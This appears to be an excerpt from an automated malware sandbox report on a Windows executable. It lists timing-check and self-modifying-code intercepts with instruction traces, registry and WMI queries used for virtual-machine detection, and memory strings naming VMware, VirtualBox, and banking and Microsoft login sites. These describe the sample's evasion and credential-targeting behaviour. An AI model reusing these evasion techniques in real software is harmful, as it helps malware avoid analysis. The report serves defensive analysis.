          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0640 second address: 49A0676 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F0821212AF9h 0x00000011 jmp 00007F0821212AF0h 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0676 second address: 49A0689 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov esi, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0689 second address: 49A068D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A068D second address: 49A0693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0693 second address: 49A06AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AF6h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A06AD second address: 49A06F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F0820DCC6B6h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F0820DCC6B1h 0x00000018 popad 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A06F0 second address: 49A06F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A06F4 second address: 49A06FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A06FA second address: 49A072A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jmp 00007F0821212AF4h 0x00000010 mov dword ptr [esp], ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0821212AEAh 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A072A second address: 49A0739 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0739 second address: 49A0751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AF4h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0751 second address: 49A0755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A07C4 second address: 49A003B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F089390095Eh 0x0000000f xor eax, eax 0x00000011 jmp 00007F08211EC21Ah 0x00000016 pop esi 0x00000017 pop edi 0x00000018 pop ebx 0x00000019 leave 0x0000001a retn 0004h 0x0000001d nop 0x0000001e cmp eax, 00000000h 0x00000021 setne cl 0x00000024 xor ebx, ebx 0x00000026 test cl, 00000001h 0x00000029 jne 00007F0821212AE7h 0x0000002b jmp 00007F0821212C1Ah 0x00000030 call 00007F0824FBF5C6h 0x00000035 mov edi, edi 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007F0821212AEEh 0x0000003e xor eax, 59955E48h 0x00000044 jmp 00007F0821212AEBh 0x00000049 popfd 0x0000004a mov esi, 2080F1BFh 0x0000004f popad 0x00000050 xchg eax, ebp 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F0821212AECh 0x0000005a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A003B second address: 49A0041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0041 second address: 49A0092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0821212AF1h 0x00000011 sbb ah, FFFFFFC6h 0x00000014 jmp 00007F0821212AF1h 0x00000019 popfd 0x0000001a mov edx, eax 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push ebx 0x00000022 pop esi 0x00000023 call 00007F0821212AEBh 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0092 second address: 49A00BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 0375527Bh 0x00000008 movzx eax, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0820DCC6B5h 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00BB second address: 49A00D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00D0 second address: 49A00E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0820DCC6ACh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00E0 second address: 49A00EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A00EE second address: 49A00F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B89 second address: 49A0B8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B8D second address: 49A0B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B93 second address: 49A0BB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ax 0x00000006 mov ecx, 3F4C417Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0821212AEFh 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0BB3 second address: 49A0BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0BB9 second address: 49A0BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0BBD second address: 49A0BC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0BC1 second address: 49A0C26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0821212AEEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F0821212AEDh 0x00000018 add eax, 40A5B6A6h 0x0000001e jmp 00007F0821212AF1h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F0821212AF0h 0x0000002a xor esi, 26A69C48h 0x00000030 jmp 00007F0821212AEBh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0C26 second address: 49A0C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0C2C second address: 49A0C42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0821212AEAh 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0C42 second address: 49A0CA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [770E459Ch], 05h 0x00000010 pushad 0x00000011 jmp 00007F0820DCC6B4h 0x00000016 mov eax, 638AA0A1h 0x0000001b popad 0x0000001c je 00007F08934AA432h 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov bh, 47h 0x00000027 pushfd 0x00000028 jmp 00007F0820DCC6B2h 0x0000002d xor ecx, 40CE7368h 0x00000033 jmp 00007F0820DCC6ABh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0CA4 second address: 49A0CAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0D14 second address: 49A0D1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0D1A second address: 49A0D44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 222B8AEDh 0x00000010 pushad 0x00000011 mov dx, si 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop edi 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0D44 second address: 49A0D70 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0820DCC6AAh 0x00000008 xor esi, 12005018h 0x0000000e jmp 00007F0820DCC6ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 call 00007F08934B14B2h 0x0000001c push 77082B70h 0x00000021 push dword ptr fs:[00000000h] 0x00000028 mov eax, dword ptr [esp+10h] 0x0000002c mov dword ptr [esp+10h], ebp 0x00000030 lea ebp, dword ptr [esp+10h] 0x00000034 sub esp, eax 0x00000036 push ebx 0x00000037 push esi 0x00000038 push edi 0x00000039 mov eax, dword ptr [770E4538h] 0x0000003e xor dword ptr [ebp-04h], eax 0x00000041 xor eax, ebp 0x00000043 push eax 0x00000044 mov dword ptr [ebp-18h], esp 0x00000047 push dword ptr [ebp-08h] 0x0000004a mov eax, dword ptr [ebp-04h] 0x0000004d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000054 mov dword ptr [ebp-08h], eax 0x00000057 lea eax, dword ptr [ebp-10h] 0x0000005a mov dword ptr fs:[00000000h], eax 0x00000060 ret 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0D70 second address: 49A0D77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, bl 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0D77 second address: 49A0DDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0820DCC6B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F0820DCC6B5h 0x00000012 jmp 00007F0820DCC6ABh 0x00000017 popfd 0x00000018 push eax 0x00000019 push edx 0x0000001a pushfd 0x0000001b jmp 00007F0820DCC6B6h 0x00000020 and ax, 9F38h 0x00000025 jmp 00007F0820DCC6ABh 0x0000002a popfd 0x0000002b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0DDD second address: 49A0DFA instructions: 0x00000000 rdtsc 0x00000002 mov esi, 62E9A16Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [ebp-1Ch], esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0821212AECh 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0DFA second address: 49A0DFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0DFE second address: 49A0E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0E4E second address: 49A0E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F0820DCC6AFh 0x00000008 pop esi 0x00000009 mov dh, 13h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test al, al 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0820DCC6B7h 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0E81 second address: 49A0EBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F08938E65CDh 0x0000000f jmp 00007F0821212AEEh 0x00000014 cmp dword ptr [ebp+08h], 00002000h 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0BAB second address: 49B0BC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F0820DCC6AEh 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0BC3 second address: 49B0BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0821212AEEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0BD5 second address: 49B0BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0D37 second address: 49B0D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 73C0993Ah 0x00000008 call 00007F0821212AEBh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007F0821212AF6h 0x00000017 xchg eax, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0D6C second address: 49B0D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0D70 second address: 49B0D74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0D74 second address: 49B0D7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0DC4 second address: 49B0DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0821212AF8h 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0DE3 second address: 49B0E30 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0820DCC6B2h 0x00000008 sub ah, FFFFFFF8h 0x0000000b jmp 00007F0820DCC6ABh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 jmp 00007F0820DCC6AFh 0x0000001b movzx ecx, bx 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0820DCC6AEh 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0E30 second address: 49B0E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0EB3 second address: 49B0EB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BF5A7 second address: 61BF5AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BF5AF second address: 61BF5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F0820DCC6A6h 0x0000000a jmp 00007F0820DCC6B9h 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61BF5D3 second address: 61BF5F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0821212AF0h 0x0000000a jl 00007F0821212AE6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F0821212AE6h 0x00000019 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D6D4F second address: 61D6D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F0820DCC6A6h 0x0000000c jnl 00007F0820DCC6A6h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D741A second address: 61D7446 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0821212AF7h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0821212AEFh 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61D7446 second address: 61D744B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: C1CBCC instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: DE6B42 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 61FE352 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 605DC91 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6291C58 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6060A51 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061EBE0B rdtsc 3_2_061EBE0B
          Source: C:\Users\user\Desktop\file.exeCode function: 3_2_061EAF36 sidt fword ptr [esp-02h]3_2_061EAF36
          Source: C:\Users\user\Desktop\file.exe TID: 7316Thread sleep time: -40020s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7176Thread sleep time: -54027s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7584Thread sleep time: -32000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7628Thread sleep time: -270000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7224Thread sleep time: -46023s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7288Thread sleep time: -58029s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7292Thread sleep time: -64032s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: file.exe, file.exe, 00000003.00000002.1836358010.0000000000D9C000.00000040.00000001.01000000.00000004.sdmp, file.exe, 00000003.00000002.1852726936.00000000061E0000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
          Source: file.exe, 00000003.00000002.1834770551.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1834770551.00000000007EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
          Source: file.exe, 00000003.00000002.1834770551.00000000007EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/9
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
          Source: file.exe, 00000003.00000003.1455186310.0000000005508000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696501413p
          Source: file.exe, 00000003.00000002.1834770551.000000000082D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
          Source: file.exe, 00000003.00000003.1455186310.0000000005503000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
